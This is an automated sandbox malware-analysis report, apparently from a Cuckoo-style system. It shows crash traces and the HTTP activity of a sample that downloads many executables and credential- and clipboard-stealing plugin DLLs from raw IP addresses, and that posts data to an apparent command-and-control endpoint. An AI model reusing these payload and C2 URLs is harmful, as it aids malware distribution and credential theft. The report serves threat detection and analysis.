__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2952cc @ 0x10352cc rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 16965772 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 11436032 registers.esi: 15630336 registers.ecx: 954228717	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2952cc @ 0x10352cc rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2952cc @ 0x10352cc rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x2952cc @ 0x10352cc rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295362 @ 0x1035362 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 16965772 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 11436032 registers.esi: 15630336 registers.ecx: 1781025675	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295362 @ 0x1035362 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295362 @ 0x1035362 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9 a.m.	stacktrace: rost+0x295362 @ 0x1035362 rost+0x297f18 @ 0x1037f18 rost+0x2218dc @ 0xfc18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: rost+0x1fe204 exception.instruction: ud2 exception.module: rost.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0xf9e204 registers.esp: 2619740 registers.edi: 2619740 registers.eax: 0 registers.ebp: 2619768 registers.edx: 2 registers.ebx: 16376346 registers.esi: 0 registers.ecx: 2619776	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559 RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639 RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x7791df95 HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x757f14dd rost+0xf38bf @ 0xe938bf rost+0xea2de @ 0xe8a2de rost+0xdc00d @ 0xe7c00d rost+0x10a272 @ 0xeaa272 rost+0xeec93 @ 0xe8ec93 rost+0xeef47 @ 0xe8ef47 rost+0xebb0a @ 0xe8bb0a rost+0xeba36 @ 0xe8ba36 rost+0xebbf8 @ 0xe8bbf8 rost+0xebd5f @ 0xe8bd5f rost+0xdc393 @ 0xe7c393 0xbb3df1fd 0x46a89700 0x27f96c exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653 exception.instruction: jmp 0x7796e667 exception.module: ntdll.dll exception.exception_code: 0xc0000374 exception.offset: 845395 exception.address: 0x7796e653 registers.esp: 2619080 registers.edi: 4898128 registers.eax: 2619096 registers.ebp: 2619200 registers.edx: 0 registers.ebx: 0 registers.esi: 4718592 registers.ecx: 2147483647	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439552 registers.edi: 5464204 registers.eax: 0 registers.ebp: 1439580 registers.edx: 2 registers.ebx: 41431884 registers.esi: 5 registers.ecx: 41431884	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439552 registers.edi: 1439552 registers.eax: 0 registers.ebp: 1439580 registers.edx: 2 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439760	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439552 registers.edi: 1439552 registers.eax: 0 registers.ebp: 1439580 registers.edx: 2 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439760	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439552 registers.edi: 1439552 registers.eax: 0 registers.ebp: 1439580 registers.edx: 2 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439760	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439552 registers.edi: 1439552 registers.eax: 0 registers.ebp: 1439580 registers.edx: 0 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439760	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439552 registers.edi: 1439552 registers.eax: 0 registers.ebp: 1439580 registers.edx: 2 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439760	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439552 registers.edi: 1439552 registers.eax: 0 registers.ebp: 1439580 registers.edx: 0 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439760	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bdbc9 @ 0x53dbc9 eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439552 registers.edi: 1439552 registers.eax: 0 registers.ebp: 1439580 registers.edx: 2 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439760	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1be8ff @ 0x53e8ff eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439504 registers.edi: 5464204 registers.eax: 0 registers.ebp: 1439532 registers.edx: 2 registers.ebx: 4294901760 registers.esi: 4128768 registers.ecx: 4128768	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1be8ff @ 0x53e8ff eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1be9db @ 0x53e9db eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 5464204 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4294901760 registers.esi: 4128768 registers.ecx: 0	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1be9db @ 0x53e9db eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1be9db @ 0x53e9db eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 2 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beaad @ 0x53eaad eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439504 registers.edi: 5464204 registers.eax: 0 registers.ebp: 1439532 registers.edx: 2 registers.ebx: 4294901760 registers.esi: 4128768 registers.ecx: 1439532	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beaad @ 0x53eaad eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 2 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beaad @ 0x53eaad eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 2 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beba7 @ 0x53eba7 eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 5464204 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4294901760 registers.esi: 4128768 registers.ecx: 0	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beba7 @ 0x53eba7 eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beba7 @ 0x53eba7 eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beba7 @ 0x53eba7 eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 2 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beba7 @ 0x53eba7 eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4874778 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1beba7 @ 0x53eba7 eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x126204 exception.instruction: ud2 exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0x4a6204 registers.esp: 1439504 registers.edi: 1439504 registers.eax: 0 registers.ebp: 1439532 registers.edx: 2 registers.ebx: 4874735 registers.esi: 0 registers.ecx: 1439540	1
__exception__ Jan. 26, 2024, 9:01 a.m.	stacktrace: eohqhakcbwtb_t1v1y_s+0x1bec3d @ 0x53ec3d eohqhakcbwtb_t1v1y_s+0x1bcc3e @ 0x53cc3e eohqhakcbwtb_t1v1y_s+0x1498dc @ 0x4c98dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: eohqhakcbwtb_t1v1y_s+0x1261d9 exception.instruction: div eax exception.module: EOhQhAkcbWTB_T1v1y_S.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0x4a61d9 registers.esp: 1439504 registers.edi: 5464204 registers.eax: 0 registers.ebp: 1439532 registers.edx: 0 registers.ebx: 4294901760 registers.esi: 4128768 registers.ecx: 141658896	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (27 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/ko.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/ko.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.68/mine/amers.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/amers.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/niks.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.68/theme/index.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/vinu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/vinu.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/stan.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/networa.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/networa.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/installs.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/fsdfsfsfs.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/MRK.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/sadsadsadsa.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/Atqumy.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.19/latestrocki.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/clip64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/moto.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/crypted.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/2024.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/alex.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://109.107.182.3/lego/rdx1122.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.172.128.109/syncUpd.exe

Performs some HTTP requests (37 events)

request	HEAD http://109.107.182.3/cost/ko.exe
request	GET http://109.107.182.3/cost/ko.exe
request	HEAD http://185.215.113.68/mine/amers.exe
request	GET http://185.215.113.68/mine/amers.exe
request	HEAD http://109.107.182.3/cost/niks.exe
request	GET http://109.107.182.3/cost/niks.exe
request	POST http://185.215.113.68/theme/index.php
request	HEAD http://109.107.182.3/cost/vinu.exe
request	GET http://109.107.182.3/cost/vinu.exe
request	GET http://185.215.113.68/mine/stan.exe
request	HEAD http://109.107.182.3/cost/networa.exe
request	GET http://109.107.182.3/cost/networa.exe
request	GET http://109.107.182.3/lego/installs.exe
request	GET http://109.107.182.3/lego/fsdfsfsfs.exe
request	GET http://185.215.113.68/theme/Plugins/cred64.dll
request	GET http://109.107.182.3/lego/MRK.exe
request	GET http://109.107.182.3/lego/sadsadsadsa.exe
request	GET http://109.107.182.3/lego/Atqumy.exe
request	GET http://185.172.128.19/latestrocki.exe
request	GET http://185.215.113.68/theme/Plugins/clip64.dll
request	GET http://109.107.182.3/lego/moto.exe
request	GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
request	GET http://109.107.182.3/lego/crypted.exe
request	GET http://109.107.182.3/lego/2024.exe
request	GET http://109.107.182.3/lego/alex.exe
request	GET http://109.107.182.3/lego/rdx1122.exe
request	GET http://185.172.128.109/syncUpd.exe
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp3H8r8UWuhQ6m2JhTn_UJWtMXXOP18B2sMD6q0yM1EirdCpLoeYafxU7OnBJOlDJRzgLznF
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp1cKQEpRqzJgd1mJyXaQDg8g6EPaDZyF3Iq1LCz13B1O_GRb-DpHv1Q3bMHBt1iGhMePExXmg&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-435268675%3A1706227291300357
request	GET https://accounts.google.com/_/bscframe
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?Gfi3rg
request	GET https://www.google.com/favicon.ico

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.68/theme/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1027 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 2936832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
